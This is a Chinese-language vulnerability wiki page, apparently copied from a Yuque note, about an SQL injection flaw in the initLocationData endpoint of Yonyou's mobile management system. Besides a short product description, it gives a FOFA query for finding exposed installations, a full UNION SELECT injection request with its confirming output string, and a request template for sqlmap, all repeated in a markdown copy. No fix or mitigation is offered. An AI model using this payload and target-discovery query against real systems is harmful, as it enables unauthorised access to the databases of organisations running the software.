fofamini-wiki

登录白背景

源码

用友移动管理系统initLocationData存在SQL注入漏洞

一、漏洞简介

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统initLocationData接口存在SQL注入漏洞

二、影响版本

用友移动系统管理系统

三、资产测绘

fofaapp="用友-移动系统管理"
特征

四、漏洞复现

POST /maportal/appmanager/initLocationData?pk_obj=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2877%29%7C%7CCHR%28114%29%7C%7CCHR%2865%29%7C%7CCHR%2898%29%7C%7CCHR%28119%29%7C%7CCHR%28103%29%7C%7CCHR%28116%29%7C%7CCHR%2898%29%7C%7CCHR%2873%29%7C%7CCHR%2881%29%7C%7CCHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%2890%29%7C%7CCHR%28100%29%7C%7CCHR%2866%29%7C%7CCHR%2875%29%7C%7CCHR%28115%29%7C%7CCHR%2881%29%7C%7CCHR%2883%29%7C%7CCHR%2882%29%7C%7CCHR%2875%29%7C%7CCHR%28100%29%7C%7CCHR%28115%29%7C%7CCHR%28115%29%7C%7CCHR%2876%29%7C%7CCHR%2870%29%7C%7CCHR%28115%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2899%29%7C%7CCHR%28105%29%7C%7CCHR%28112%29%7C%7CCHR%28105%29%7C%7CCHR%2899%29%7C%7CCHR%2898%29%7C%7CCHR%2897%29%7C%7CCHR%2878%29%7C%7CCHR%2877%29%7C%7CCHR%28120%29%7C%7CCHR%2897%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL+FROM+DUAL--+tMeB HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=D3CDA75976CF4C0F156A83481DE4FB22.server
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1

=

qpjqqMrAbwgtbIQyiZdBKsQSRKdssLFshkcipicbaNMxaqvkqq

sqlmap

POST /maportal/appmanager/initLocationData?pk_obj=1 HTTP/1.1
Host: {hsotname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=D3CDA75976CF4C0F156A83481DE4FB22.server
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1

=

原文: https://www.yuque.com/xiaokp7/ocvun2/lgf784qyrbrlsppa

# 用友移动管理系统initLocationData存在SQL注入漏洞

# 一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统initLocationData接口存在SQL注入漏洞

# 二、影响版本

- 用友移动系统管理系统

# 三、资产测绘

- fofa`app="用友-移动系统管理"`
- 特征

![image.png](./img/_DrrMlPer7fK_RrU/1692116995132-c3250344-57a9-4ea4-a699-2c1060a6174f-044287.png)

# 四、漏洞复现
```
POST /maportal/appmanager/initLocationData?pk_obj=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2877%29%7C%7CCHR%28114%29%7C%7CCHR%2865%29%7C%7CCHR%2898%29%7C%7CCHR%28119%29%7C%7CCHR%28103%29%7C%7CCHR%28116%29%7C%7CCHR%2898%29%7C%7CCHR%2873%29%7C%7CCHR%2881%29%7C%7CCHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%2890%29%7C%7CCHR%28100%29%7C%7CCHR%2866%29%7C%7CCHR%2875%29%7C%7CCHR%28115%29%7C%7CCHR%2881%29%7C%7CCHR%2883%29%7C%7CCHR%2882%29%7C%7CCHR%2875%29%7C%7CCHR%28100%29%7C%7CCHR%28115%29%7C%7CCHR%28115%29%7C%7CCHR%2876%29%7C%7CCHR%2870%29%7C%7CCHR%28115%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2899%29%7C%7CCHR%28105%29%7C%7CCHR%28112%29%7C%7CCHR%28105%29%7C%7CCHR%2899%29%7C%7CCHR%2898%29%7C%7CCHR%2897%29%7C%7CCHR%2878%29%7C%7CCHR%2877%29%7C%7CCHR%28120%29%7C%7CCHR%2897%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL+FROM+DUAL--+tMeB HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=D3CDA75976CF4C0F156A83481DE4FB22.server
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1

=
```
![image.png](./img/_DrrMlPer7fK_RrU/1702738351676-7423cf3e-894c-45c2-82c2-48e7774c13df-384834.png)
```
qpjqqMrAbwgtbIQyiZdBKsQSRKdssLFshkcipicbaNMxaqvkqq
```
sqlmap
```
POST /maportal/appmanager/initLocationData?pk_obj=1 HTTP/1.1
Host: {hsotname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=D3CDA75976CF4C0F156A83481DE4FB22.server
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1

=
```
![image.png](./img/_DrrMlPer7fK_RrU/1702738420635-b408062b-76cc-43e3-84d8-517c1e87b3e2-600841.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgf784qyrbrlsppa>